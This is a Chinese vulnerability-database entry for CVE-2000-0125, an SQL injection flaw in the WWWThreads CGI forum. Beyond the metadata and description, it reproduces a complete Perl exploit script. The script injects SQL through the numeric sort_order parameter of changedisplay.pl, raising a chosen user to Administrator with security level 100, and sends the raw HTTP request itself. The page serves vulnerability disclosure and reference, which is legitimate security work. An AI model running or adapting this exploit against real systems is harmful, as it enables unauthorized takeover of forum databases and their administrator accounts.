WWWThreads SQL命令输入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105700 漏洞类型 输入验证
发布时间 2000-02-03 更新时间 2006-08-07
CVE编号 CVE-2000-0125 CNNVD-ID CNNVD-200002-027
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19741
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-027
|漏洞详情
wwwthreads无法正确清洗传递给SQL查询的数字数据或表的名称。远程攻击者利用此漏洞可以提升wwwthreads论坛的特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/967/info


WWWThreads is a web bulletin board program that uses an SQL backend. Due to incomplete input validation, it is possible for an attacker to submit SQL commands through forms and manipulate the contents of the database to gain administrator privileges over the database.

There are various ways for a program to ensure that all entries into data fields are interpreted as data and not SQL commands. WWWThreads uses the quote() function to do this on string values, but fails to verify numeric values in a similar manner. Therefore, SQL commands can be passed to WWWThreads via any numeric argument. These commands can be used to update the status of any user to Administrator and change their security level to '100' (the same level as the Administrator). 

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="localhost";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
        my ($pstr)=@_; my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}
|参考资料

来源:BUGTRAQ
名称:20000203RFP2K01-"HowIhackedPacketstorm"(wwwthreadsadvisory)
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10002031027120.15921-100000@eight.wiretrip.net
来源:BID
名称:967
链接:http://www.securityfocus.com/bid/967